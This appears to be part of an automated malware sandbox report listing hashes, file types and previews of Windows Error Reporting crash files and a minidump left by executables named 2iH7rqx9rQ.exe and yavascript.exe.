SHA-512:	E198ECB6DAB9A155DEAD1033AC491A5ED76503896503D10615AA1907506C950A41676D4AF82A4A594ECAF88748F0E085ACFD66D902672EBAE2A051C10663A7FC
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.7.4.2.8.3.7.9.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.8.e.8.9.6.f.-.b.6.d.0.-.4.c.7.e.-.b.a.4.2.-.c.5.f.a.3.a.7.4.b.9.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.6.e.9.f.3.3.-.0.6.7.e.-.4.f.f.1.-.b.e.f.8.-.9.f.6.b.6.3.0.6.4.d.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_74ac6590-a04e-4313-80b4-be6064186ed5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9137735223503753
Encrypted:	false
SSDEEP:	192:3Cf5H5e056rYjvDZr6CzuiF8Z24IO8KEw:SfJ5F56rYjPzuiF8Y4IO8K
MD5:	6DB3D3C4BB25D9F243C1F6BBB0F2A877
SHA1:	55B995F8C1EC6332752D664DFD4DFD05B3CF851E
SHA-256:	F5DA23E93CEBDACD5E486B0A687ADE1916808834D545CDD65658395DA2E7CC4A
SHA-512:	EDCB7141B5A314A0C068E600B49410CDA298577900C632231210BDA2710D7DDF87C883FD988FDC10098467BE14B596B540ABB8FE6E84697D5422D3FA96D9415B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.7.3.3.6.4.4.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.a.c.6.5.9.0.-.a.0.4.e.-.4.3.1.3.-.8.0.b.4.-.b.e.6.0.6.4.1.8.6.e.d.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.c.7.d.9.0.a.-.a.3.b.7.-.4.3.5.b.-.a.0.6.1.-.8.f.d.2.c.5.5.3.3.0.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_9457c8c1-45d6-47a9-a325-a116b31a2bb5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9277657757912989
Encrypted:	false
SSDEEP:	96:5loHxsg0/oA7JfGQXIDcQnc6rCcEhcw3r56O+HbHg/8BRTf32rLOyKZoxmftZrco:0Hxe056rYjvDZr6rzuiF8Z24IO8KEw
MD5:	36DDF8486C006350EE72BD7152C74922
SHA1:	AC0E3E7AC4D70C6FDF7E4AA4AFE0EE9233D76BFC
SHA-256:	B4A59A55F967B6BB4E4B1D1830E4DC8FE1619BC51BEDCE54E9CCECD189E40694
SHA-512:	874B092751635AE7F100620ACD9FA5DEAF993DCB70964A454D975140EBAD82D780A669AC94FF83671DA4DAC43D3F7A6B52E9B2D49FDB9DC305350EBA5DB10C12
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.7.6.1.3.0.0.8.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.5.7.c.8.c.1.-.4.5.d.6.-.4.7.a.9.-.a.3.2.5.-.a.1.1.6.b.3.1.a.2.b.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.2.c.1.7.5.b.-.c.4.b.1.-.4.3.b.4.-.9.b.4.2.-.2.d.1.f.6.4.c.0.4.7.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_a01e0c67-033e-4640-b55f-69ba059ab34e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9275746040677806
Encrypted:	false
SSDEEP:	96:IZHysg0/oA7JfGQXIDcQnc6rCcEhcw3r56O+HbHg/8BRTf32rLOyKZoxmftZrcmA:WHye056rYjvDZr6rzuiFXZ24IO8KEw
MD5:	4F3324F7E945CED14BA95AF21B7A0266
SHA1:	887B2083E71A6F26F1D51EE18187F55A632369C0
SHA-256:	D6F4C64DF291392B1F5C16DCC79B4A65D7EFC569A6468E684EECA6C96527CF56
SHA-512:	1B6A432F6E5101A9568378780692243CD8B6772C05AB85F1EAFD42BFF59C1E7E07ADF2E0D808F74E4BDAC2B3F5DBC864B6237A87229506D39D1BA755F01DAC75
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.0.1.8.9.3.4.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.1.e.0.c.6.7.-.0.3.3.e.-.4.6.4.0.-.b.5.5.f.-.6.9.b.a.0.5.9.a.b.3.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.2.7.9.7.4.0.-.4.0.8.0.-.4.3.5.6.-.8.d.4.f.-.9.3.8.8.b.9.e.4.b.8.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_fcf34b2d-a6c0-4168-9476-46883c48e6d6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9275893455554187
Encrypted:	false
SSDEEP:	192:UgHoe056rYjvDZr6rzuiFXZ24IO8KEwA:joF56rYjuzuiFXY4IO8K
MD5:	EBDB179C918F7524687E584A215AA517
SHA1:	B69AA7385321674B2052FA5ABFC6CF5D7DAB1F3A
SHA-256:	4E1F3C75FF75050C22F5295C38E03E1C30C37F9595DDD1A18121C289486E2ED2
SHA-512:	452B644628F085D94D19BE9807CDE7953F8BDD92A0416B1934DAA710233797B9D30333E5025C6703985B6BAB425402CF37DD1CE579042D3CA149B395EA3C7967
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.1.3.7.1.4.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.f.3.4.b.2.d.-.a.6.c.0.-.4.1.6.8.-.9.4.7.6.-.4.6.8.8.3.c.4.8.e.6.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.4.f.d.7.d.5.-.6.5.1.3.-.4.e.f.7.-.b.2.1.3.-.5.7.8.0.d.f.0.2.4.6.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_1efb56f6b9cf91c7520f0b1ef65ed41a9e36b43_7edf222e_a68019d7-2b08-406f-9073-0d9c9570e66c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	0.8515076771691052
Encrypted:	false
SSDEEP:	192:7MKJ3oa0BzDcj38Zr2zuiFXZ24IO8GJB:AKJYhBzDcj1zuiFXY4IO8GJB
MD5:	734127C8F40D9374C4FEA08C0CF1C349
SHA1:	2698055BA2C7CCB6451E221C183297A86E53E62F
SHA-256:	2A9E970D690947B188E8CB1C789F0DD147A0D8B8A383799456751F9AB27D8AE0
SHA-512:	E74F616FD62E1827748BC33CDEAEB5F2CB77C8232FC96DB277E616CB656ED1C2E2BCF32E2D19591CE10DDAC7961D700751DD4296D64E174932B5BF8583B299B3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.8.6.7.9.4.9.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.9.3.9.8.2.3.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.8.0.1.9.d.7.-.2.b.0.8.-.4.0.6.f.-.9.0.7.3.-.0.d.9.c.9.5.7.0.e.6.6.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.c.7.1.0.5.e.-.1.1.d.3.-.4.6.2.f.-.8.c.b.f.-.8.e.6.8.f.a.f.6.7.8.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.4.-.0.0.0.1.-.0.0.1.4.-.c.f.3.8.-.1.2.2.2.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.6.3.c.c.2.0.f.4.f.e.6.d.e.c.1.7.b.9.6.c.f.8.5.a.3.b.a.b.b.c.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_926899e21cd23cfb94324b39e322176f45f44325_7edf222e_f8f54bb2-3b7c-4b9d-8ba6-8f05524b551a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8956984407690554
Encrypted:	false
SSDEEP:	192:kkdz0JsAnbcAPjvDZrxrzuiFbZ24IO8GJB:kkdgJsAnbcAPjTzuiFbY4IO8GJB
MD5:	5EA166A3BBF66D247475F1EC31AE12C7
SHA1:	0D147B0D3D8C33014973C507229496F1E1260D6F
SHA-256:	1F9E3CA91B82442410B877DBBD915984385257F982B95F1B89991B4FECCE5D5F
SHA-512:	3482CCB43DB933CEF086D9FB9E2C364D09364CEE5E4FABA1420CE638252A333CB4E438CD6B6C265D37624F9EF08C70091A9857DCCFB7BE62181FB9C222C21C48
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.6.1.4.5.5.8.2.8.5.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.f.5.4.b.b.2.-.3.b.7.c.-.4.b.9.d.-.8.b.a.6.-.8.f.0.5.5.2.4.b.5.5.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.6.b.2.3.d.5.-.f.3.2.e.-.4.6.e.0.-.a.a.7.4.-.2.b.6.7.6.0.1.5.c.5.8.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.4.-.0.0.0.1.-.0.0.1.4.-.b.3.6.9.-.e.1.2.1.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.6.3.c.c.2.0.f.4.f.e.6.d.e.c.1.7.b.9.6.c.f.8.5.a.3.b.a.b.b.c.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_b8ee494996f173fc37078f29c62439bd6c083_7edf222e_445201ce-aea0-4a77-8f3c-456153ba2629\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.895330647624113
Encrypted:	false
SSDEEP:	96:2/37ms10/oA7JfGQXIDcQnc6rCcEhcw3r5t3+HbHg/8BRTf32rLOyKZoxmftZrcS:+37mD056rAjvDZrxrzuiFbZ24IO8GJB
MD5:	38A4CAA6C976729633B3CD2BF193898B
SHA1:	B6B96CF47BCCAAE6EBF0873D265E732BEB7CC378
SHA-256:	7597CC0BD66C27148015117BFDCACC7BEB21E9C633C5BC01B0A1C438D930EFEC
SHA-512:	FBBFDEF9AAE4FE9DB68432AA8213AC0FFB820239E399ED72EC86321BF3D8D22A4BABC7677C46BA1992E601A06E432E5565E575319126E95757B229017E8061A3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.6.1.4.7.9.5.7.7.0.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.5.2.0.1.c.e.-.a.e.a.0.-.4.a.7.7.-.8.f.3.c.-.4.5.6.1.5.3.b.a.2.6.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.8.7.3.b.f.0.-.f.2.5.c.-.4.1.e.d.-.a.7.e.d.-.7.1.1.6.c.3.b.f.e.2.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.4.-.0.0.0.1.-.0.0.1.4.-.b.3.6.9.-.e.1.2.1.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.6.3.c.c.2.0.f.4.f.e.6.d.e.c.1.7.b.9.6.c.f.8.5.a.3.b.a.b.b.c.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_b8ee494996f173fc37078f29c62439bd6c083_7edf222e_58ded5f8-fd38-481b-80bd-b3e39954df1d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8681665604688817
Encrypted:	false
SSDEEP:	96:yHIbOWs10/oA7JfGQXIDcQnc6rCcEhcw3r5t3+HbHg/8BRTf32rLOyKZoxmftZre:IvWD056rAjvDZrWzuiFXZ24IO8GJB
MD5:	32016A675E7BC44667419F4FC7051293
SHA1:	744A93B0419AE11DE220BE232D45B882F2645D2A
SHA-256:	3D14990C73ED72E331112771E7806023F828047BF2A348E2A83AA0D1DFB51E62
SHA-512:	FE7AF19493BDFD476A43C857340EA7D1C835055F4159A9A8BF3A5DFFF4437F230629F515407014331E922001C208D1D11099E93809974E5DC7007964286352F1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.8.6.0.1.3.6.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.d.e.d.5.f.8.-.f.d.3.8.-.4.8.1.b.-.8.0.b.d.-.b.3.e.3.9.9.5.4.d.f.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.8.f.9.7.f.6.-.b.c.d.d.-.4.c.5.e.-.a.e.6.b.-.c.a.8.7.e.b.0.0.a.0.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.4.-.0.0.0.1.-.0.0.1.4.-.b.3.6.9.-.e.1.2.1.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.6.3.c.c.2.0.f.4.f.e.6.d.e.c.1.7.b.9.6.c.f.8.5.a.3.b.a.b.b.c.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_b8ee494996f173fc37078f29c62439bd6c083_7edf222e_84c2123e-5b72-40c1-8573-cd74aadceb3a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8958203591589855
Encrypted:	false
SSDEEP:	96:LkmwYus10/oA7JfGQXIDcQnc6rCcEhcw3r5t3+HbHg/8BRTf32rLOyKZoxmftZrO:QmwpD056rAjvDZrxrzuiFbZ24IO8GJB
MD5:	DD9DF0EF2EDDBF9AA763BF8ECF0D13C2
SHA1:	A789189738C712DBE5DE7F34ACB6EB17394F2CBD
SHA-256:	604ADF0723A95E1CC9556E9F958D45B0C6AF835FE50B2597FCAFD024BB78A12C
SHA-512:	6D43F20ED422BBA47EC9BD49522832C0DEBC2DE65F2D7B318C18105BFB1CC13AC35FDBCBA124F63421A85C17B92E8321318DCBDF57B5FD7F051919B75360CAFD
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.6.1.4.4.2.6.7.3.7.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.c.2.1.2.3.e.-.5.b.7.2.-.4.0.c.1.-.8.5.7.3.-.c.d.7.4.a.a.d.c.e.b.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.c.5.b.5.9.e.-.6.7.c.c.-.4.b.3.8.-.b.8.2.7.-.3.b.b.9.1.e.0.b.c.f.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.4.-.0.0.0.1.-.0.0.1.4.-.b.3.6.9.-.e.1.2.1.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.6.3.c.c.2.0.f.4.f.e.6.d.e.c.1.7.b.9.6.c.f.8.5.a.3.b.a.b.b.c.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FC5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:13 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	54944
Entropy (8bit):	2.2120796250375134
Encrypted:	false
SSDEEP:	384:4CfO66TXYnismSAg+QizkaU013SKVWfl:4CfO6uX0WVY10fWt
MD5:	D4273C225A8105B0D8A6D13563335A46
SHA1:	D207CE4B1E0AADD9619D73759B97E2C43F39A5DB
SHA-256:	56936E2165AC64841F35320A8042C826F2ADEB884D566D7705CFF051C53EDDB5
SHA-512:	7D731237D64D929FFA11D406FB06129357F52656A94DD2372B53624235389FE5B484F3CFAFBF8BCE1F74FF9A11BCBB1839F47A0BD057CBDE0F7092DE64F19ABC
Malicious:	false
